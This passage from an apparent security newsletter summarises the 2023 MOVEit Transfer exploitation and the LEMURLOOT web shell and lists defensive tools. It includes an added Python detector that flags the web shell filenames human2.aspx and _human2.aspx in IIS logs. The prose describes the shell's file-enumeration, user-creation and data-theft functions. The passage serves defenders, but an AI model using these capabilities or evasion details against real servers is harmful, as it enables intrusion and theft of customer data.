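    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path, "rb").read() if path else build_minimal_pe(0x200, 0x200)
    print(assess(data))
```

Pointed at a real file it prints the verdict for that binary; without an argument it assesses a constructed low-alignment header. A hit on low_alignment is a strong triage signal on its own, since compilers do not emit it for ordinary executables, and a file that is also not spec_consistent is malformed as well as suspicious.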
Exploitation
What is being exploited.
MOVEit Transfer Critical Vulnerability (May 2023)
The understatement of the week, and a whole host of reporting and real-world impact followed.
Progress has discovered a vulnerability in MOVEit Transfer that could lead to escalated privileges and potential unauthorized access to the environment. If you are a MOVEit Transfer customer, it is extremely important that you take immediate action as noted below in order to help protect your MOVEit Transfer environment.
https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023
Zero-Day Vulnerability in MOVEit Transfer Exploited for Data Theft
Initial reporting by an army of analysts here.
Following exploitation of the vulnerability, the threat actors are deploying a newly discovered LEMURLOOT web shell with filenames that masquerade as human.aspx, which is a legitimate component of the MOVEit Transfer software. [We have] observed several POST requests made to the legitimate guestaccess.aspx file before interaction with the LEMURLOOT webshell, indicating SQLi attacks were directed towards that file.
We have observed LEMURLOOT samples with the filenames human2.aspx and _human2.aspx. Various samples with the name human2.aspx were uploaded to VirusTotal beginning on May 28, 2023. Samples of LEMURLOOT have been uploaded to public repositories from several additional countries—including Italy, Pakistan, and Germany—suggesting that UNC4857 has also impacted organizations in these nations.
LEMURLOOT provides functionality tailored to execute on a system running MOVEit Transfer software, including the ability to generate commands to enumerate files and folders, retrieve configuration information, and create or delete a user with a hard-coded name. Initial analysis suggests that the LEMURLOOT web shell is being used to steal data previously uploaded by the users of individual MOVEit Transfer systems.
https://www.mandiant.com/resources/blog/zero-day-moveit-data-theft
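The two observables Mandiant describes above (POSTs to the legitimate guestaccess.aspx preceding the first hit on a human2.aspx / _human2.aspx web shell) translate directly into a log check. The following is an added example, not code from Mandiant or the newsletter: it parses an IIS W3C log excerpt, which is constructed here as sample input, and raises an alert for any request to the reported web shell names, promoting it to high severity when the same client previously POSTed to guestaccess.aspx. The field list and IP addresses are assumptions for the sample only.

```python
from collections import defaultdict

# Web shell filenames reported in the Mandiant write-up; extend as new names are published
LEMURLOOT_NAMES = {"human2.aspx", "_human2.aspx"}
SQLI_TARGET = "guestaccess.aspx"   # legitimate file that received the POSTs before shell use

# Constructed sample IIS W3C log excerpt (not real data); the #Fields line drives parsing
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2023-05-28 02:11:03 10.0.0.5 GET /human.aspx - 443 198.51.100.7 200
2023-05-28 02:11:09 10.0.0.5 POST /guestaccess.aspx - 443 203.0.113.9 200
2023-05-28 02:11:10 10.0.0.5 POST /guestaccess.aspx - 443 203.0.113.9 200
2023-05-28 02:11:14 10.0.0.5 POST /human2.aspx - 443 203.0.113.9 200
2023-05-28 02:12:01 10.0.0.5 GET /human.aspx - 443 198.51.100.7 200
2023-05-28 02:13:44 10.0.0.5 GET /_human2.aspx - 443 192.0.2.44 404
"""


def parse_iis(text: str):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if fields and len(parts) == len(fields):
            yield dict(zip(fields, parts))


def detect_lemurloot(text: str) -> list:
    """Return alerts for requests to known LEMURLOOT filenames.  Severity is
    'high' when the client already POSTed to guestaccess.aspx (the SQLi
    precursor Mandiant observed), otherwise 'medium'."""
    alerts = []
    guestaccess_posts = defaultdict(int)   # c-ip -> number of prior POSTs to guestaccess.aspx
    for rec in parse_iis(text):
        stem = rec["cs-uri-stem"].rsplit("/", 1)[-1].lower()
        client = rec["c-ip"]
        if rec["cs-method"].upper() == "POST" and stem == SQLI_TARGET:
            guestaccess_posts[client] += 1
        if stem in LEMURLOOT_NAMES:
            prior = guestaccess_posts[client]
            alerts.append({
                "time": f"{rec['date']} {rec['time']}",
                "client": client,
                "uri": rec["cs-uri-stem"],
                "status": rec["sc-status"],
                "prior_guestaccess_posts": prior,
                "severity": "high" if prior else "medium",
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_lemurloot(SAMPLE_LOG):
        print(alert)
```

A 404 on a shell filename (the last sample line) still merits an alert: it shows a client probing for the web shell even if the upload failed or was already removed, and the preceding guestaccess.aspx POSTs from a high-severity client are where the SQLi payloads themselves should be looked for.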
MOVEit Transfer Exploited to Drop File-Stealing SQL Shell
Alex Delamotte provides further extended reporting on an unreported aspect.
[We have] observed in-the-wild (ITW) exploitation of CVE-2023-34362, a vulnerability in the MOVEit file transfer server application. The attack delivers a Microsoft IIS .aspx payload that enables limited interaction between the affected web server and connected Azure blob storage. On June 5, the Cl0p ransomware group claimed responsibility for these attacks, though [we] note the targeting of a file transfer application vulnerability resembles other exploitation conducted by financially motivated actors throughout early 2023.
https://www.sentinelone.com/blog/moveit-transfer-exploited-to-drop-file-stealing-sql-shell/
MOVEit-Transfer: A repository for tracking events related to the MOVEit Transfer Cl0p Campaign
Then there was one repo to rule them all on the topic by the wonderful team at Curated Intel.
A repository for tracking events related to the MOVEit Transfer Hacking Campaign
Events mapped to the Diamond Model, plus resources and information
https://github.com/curated-intel/MOVEit-Transfer
Barracuda Email Security Gateway Appliance (ESG) Vulnerability
The initial report on this last week got worse, as Barracuda now says the appliances need to be physically replaced.
June 6th update - Impacted ESG appliances must be immediately replaced regardless of patch version level. If you have not replaced your appliance after receiving notice in your UI, contact support now
Tooling and Techniques
Low level tooling and techniques for attack and defence researchers…
pkilint
A framework for verifying PKI structures
pkilint is a linting framework for documents that are encoded using ASN.1. pkilint is designed to be a highly extensible toolbox to quickly create linters for a variety of ASN.1 structure/"document" types to check for compliance with various standards and policies.
https://github.com/digicert/pkilint
fq: jq for binary formats
Mattias Wadman released this work to aid analysts.
fq is inspired by the well known jq tool and language that allows you to work with binary formats the same way you would using jq. In addition it can present data like a hex viewer, transform, slice and concatenate binary data. It also supports nested formats and has an interactive REPL with auto-completion.
ebpfguard
A Rust library for writing Linux security policies using eBPF
Ebpfguard is a library for managing Linux security policies. It is based on LSM hooks, but without the need to write any kernel modules or eBPF programs directly. It allows you to write policies in Rust (or YAML) in user space.
https://github.com/deepfence/ebpfguard
bin2ml
A command line tool for extracting machine learning ready data from software binaries
bin2ml is a command line tool to extract machine learning ready data from software binaries. It's ideal for researchers and hackers to easily extract data suitable for training machine learning approaches such as natural language processing (NLP) or Graph Neural Network (GNN) models using data derived from software binaries.
https://github.com/br0kej/bin2ml
Binder Trace
An IPC sniffer for Android which will help both malware analysts and vulnerability researchers.
Binder Trace is a tool for intercepting and parsing Android Binder messages. Think of it as "Wireshark for Binder".
https://github.com/foundryzero/binder-trace
Footnotes
Some other small (and not so small) bits and bobs which might be of interest.
Aggregate reporting
Making Sense of Large-scale Cyber Incidents: International Cybersecurity Beyond Threat-based Security Perspectives - The findings reveal a steady development towards an increasingly threat-based security logic in both national and international cyber policy settings. The case studies also highlight the volatile nature of malware proliferation, the tendency of collateral damage from directed cyberattacks, the transboundary characteristics of large-scale cyber incidents, and the central role of civil contingencies actors and the private sector in cybersecurity governance.
Here's what Denmark can teach others about cyber resilience - via the World Economic Forum - I can’t work out the sales angle here.
Cyber-enabled tradecraft and contemporary espionage: assessing the implications of the tradecraft paradox on agent recruitment in Russia and China - This paper considers the utility of cyberspace for espionage recruitment in these two hard target states, and assesses its value as a potential solution to emerging surveillance threats.
Google Secure AI Framework (SAIF) - said in a South London accent.
Delivering Security at Scale: From Artisanal to Industrial - by the venerable Phil Venables.
Fostering Open Source Software Security - Open source software (OSS) is the backbone and driver of digitization across sectors worldwide. This makes OSS a cornerstone of every society and economy, including the core of national security concerns. Therefore, governments have a vested interest in OSS security. At the same time, governments, as large users of OSS, bear some of the responsibility for supporting the OSS ecosystem.
Private Eyes: China’s Embrace of Open-Source Military Intelligence
Cutting Medusa's Path -- Tackling Kill-Chains with Quantum Computing - This paper embarks upon exploration of quantum vulnerability analysis. The example given is to prioritize patches by expressing the connectivity of various vulnerabilities on a network with a QUBO and then solving this with quantum annealing. Such a solution is then proved to remove all kill-chains (paths to security compromise) on a network.
CDEI portfolio of AI assurance techniques - as mentioned with the notable cyber gap.
Quantifying Memorization Across Neural Language Models - Large language models (LMs) have been shown to memorize parts of their training data, and when prompted appropriately, they will emit the memorized training data verbatim. This is undesirable because memorization violates privacy (exposing user data), degrades utility (repeated easy-to-memorize text is often low quality), and hurts fairness (some texts are memorized over others). We describe three log-linear relationships that quantify the degree to which LMs emit memorized training data. Memorization significantly grows as we increase (1) the capacity of a model, (2) the number of times an example has been duplicated, and (3) the number of tokens of context used to prompt the model.
AlphaDev discovers faster sorting algorithms - we introduce AlphaDev, an artificial intelligence (AI) system that uses reinforcement learning to discover enhanced computer science algorithms – surpassing those honed by scientists and engineers over decades.
This newsletter is produced by BinaryFirefly; it is via BinaryFirefly that I support a hand-picked set of organisations across investment, strategy and capability in the domain of cyber.
For sponsorship enquiries regarding Bluepurple or anything else contact hello@binaryfirefly.com.